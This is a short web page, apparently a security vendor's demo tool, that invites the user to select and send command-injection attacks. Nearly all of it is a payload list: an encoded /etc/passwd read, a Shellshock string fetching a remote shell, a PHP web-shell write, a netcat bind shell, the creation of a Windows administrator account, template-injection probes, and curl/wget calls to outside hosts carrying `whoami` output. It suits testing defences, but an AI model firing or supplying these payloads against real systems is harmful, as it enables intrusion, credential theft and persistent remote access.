HOME
ATTACKS
Let's Launch Some Command Injection Attacks
Select Attack Payload and Run it!
Command Injection Attacks
curl -O http://test.com
.gethostbyname(lc(''hitfz''.''sflueefu1a22c.bxss.me.'')).''A''.chr(67)
echo Y2F0IC9ldGMvcGFzc3dkCg==|base64 -d|sh
`xxd -r -p <<< 6c73``
cat ${HOME:0:1}etc${HOME:0:1}passwd
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shell
{{ get_user_file("/etc/passwd") }}
; echo '?php system($_GET['cmd']); ?>" > cmd.php
\n\033[2curl http://135.23.158.130/.testing/term_escape.txt??user=\`whoami\`
| nc -lvvp 4444 -e /bin/sh|
&& net localgroup Administrators hacker /ADD
& perl -e 'print "X"x2048'
system("curl https://crowdshield.com/.testing/rce_vuln.txt?meth")
${@print(system($_SERVER['HTTP_USER_AGENT']))}
system('curl https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2wdf')
test*; ls -lhtR /var/www/
{{[] .__ Class __.__ base __.__ subclasses __ ()}}
{% For c in [1,2,3]%} {{c, c, c}} {% endfor%}
| dir C:\Documents and Settings\*
echo 'script>alert(1)/script>'// XXXXXXXXXXX
$(`wget https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)
&& type %SYSTEMROOT%\repair\SYSTEM
;system('/usr/bin/id')
Send Attack
©
Monitorapp
All Right Reserved